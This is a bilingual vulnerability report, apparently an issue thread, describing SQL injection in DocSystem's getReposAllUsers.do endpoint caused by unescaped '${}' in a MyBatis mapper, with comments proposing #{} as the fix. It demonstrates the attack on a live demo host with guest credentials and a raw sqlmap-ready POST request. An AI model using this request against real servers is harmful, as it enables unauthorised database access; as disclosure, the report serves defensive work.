English :
There is an interface for sql injection:
/DocSystem/Repos/getReposAllUsers.do
It can be seen from the back-end code that the interface database query uses 'getReposAllUsers()', and receives two parameters 'searchWord' and 'reposId':

'getReposAllUsers()' uses 'queryReposMemberWithParamLike()' to process the incoming parameters


View 'ReposAuthMapper.xml':

It is found that ‘queryReposMemberWithParamLike‘ uses '${}' for the incoming parameters without precompilation, which will lead to sql injection vulnerabilities.
Vulnerability Exploitation Process Demonstration
Use the demo site provided by the author to demonstrate the exploit.
http://dw.gofreeteam.com/DocSystem/web/index.html
Login with guest/guest

Grab the request packet:

Modify the URL to ‘/DocSystem/Repos/getReposAllUsers.do‘ and change it to the post request method:

Construct the request to populate the ‘reposId‘ and ‘searchWord‘ parameter:

SQL injection using searchWord parameters:

Use sqlmap for verification, the data package is as follows:
POST /DocSystem/Repos/getReposAllUsers.do HTTP/1.1
Host: dw.gofreeteam.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=30230AB3A967C905F212A4D3A981894D
If-Modified-Since: Mon, 15 Aug 2022 09:41:58 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
reposId=28&searchWord=*
Use sql injection vulnerability to get the current database name:

中文:
存在注入的接口:
/DocSystem/Repos/getReposAllUsers.do
通过后端代码可知,该接口数据库查询使用了getReposAllUsers(),并包含两个参数searchWord以及reposId:

getReposAllUsers() 又使用了queryReposMemberWithParamLike()对传入的参数进行处理


查看ReposAuthMapper.xml:

发现queryReposMemberWithParamLike中对参数使用'${}',未作预编译,会导致sql注入漏洞。
漏洞演示:
利用作者提供的演示站点进行利用:
http://dw.gofreeteam.com/DocSystem/web/index.html
使用guest/guest登录

抓包:

修改URL为/DocSystem/Repos/getReposAllUsers.do 并改为post请求:

构造请求填充reposId和searchWord字段:

利用searchWord参数进行sql注入:

使用sqlmap进行验证,数据包如下:
POST /DocSystem/Repos/getReposAllUsers.do HTTP/1.1
Host: dw.gofreeteam.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=30230AB3A967C905F212A4D3A981894D
If-Modified-Since: Mon, 15 Aug 2022 09:41:58 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
reposId=28&searchWord=*
注入得到当前数据库名:

此外,还有其他接口的like语句也未使用预编译。
请问是把 searchWord 的内容改成 sql 语法吗?
我看你的截图里的searchWord只是改成*,是不是截图不完整?
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
#{} replace the '%${}%' to avoid the injection of sql command
登录 后才可以发表评论